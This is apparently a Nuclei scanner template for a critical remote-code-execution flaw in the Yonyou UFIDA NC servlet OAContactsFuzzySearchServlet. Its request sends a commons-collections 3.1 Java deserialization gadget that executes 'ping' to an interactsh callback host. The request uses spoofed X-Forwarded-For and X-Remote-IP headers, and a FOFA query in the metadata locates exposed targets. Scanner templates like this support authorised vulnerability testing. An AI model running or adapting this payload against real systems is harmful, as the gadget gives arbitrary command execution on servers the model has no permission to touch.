id: yonyou-nc-OAContactsFuzzySearchServlet-rce

info:
  name: 用友 UFIDA NC nc.uap.bs.im.servlet.OAContactsFuzzySearchServlet - rce
  author: zhxknb1
  severity: critical
  description:
  reference:
    - todo
  metadata:
    veified: true
    fofa-query: icon_hash="1085941792" || app="用友-UFIDA-NC"
  tags: yonyou,nc,rce,oa,oob

http:
  - raw:
      - |
        POST /servlet/~webbd/nc.uap.bs.im.servlet.OAContactsFuzzySearchServlet HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: 127.0.0.10
        X-Originating-IP: 127.0.0.10
        X-Remote-Addr: 127.0.0.10
        X-Remote-IP: 127.0.0.10

        {{generate_java_gadget("commons-collections3.1", "ping {{interactsh-url}}", "raw")}}

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
        condition: or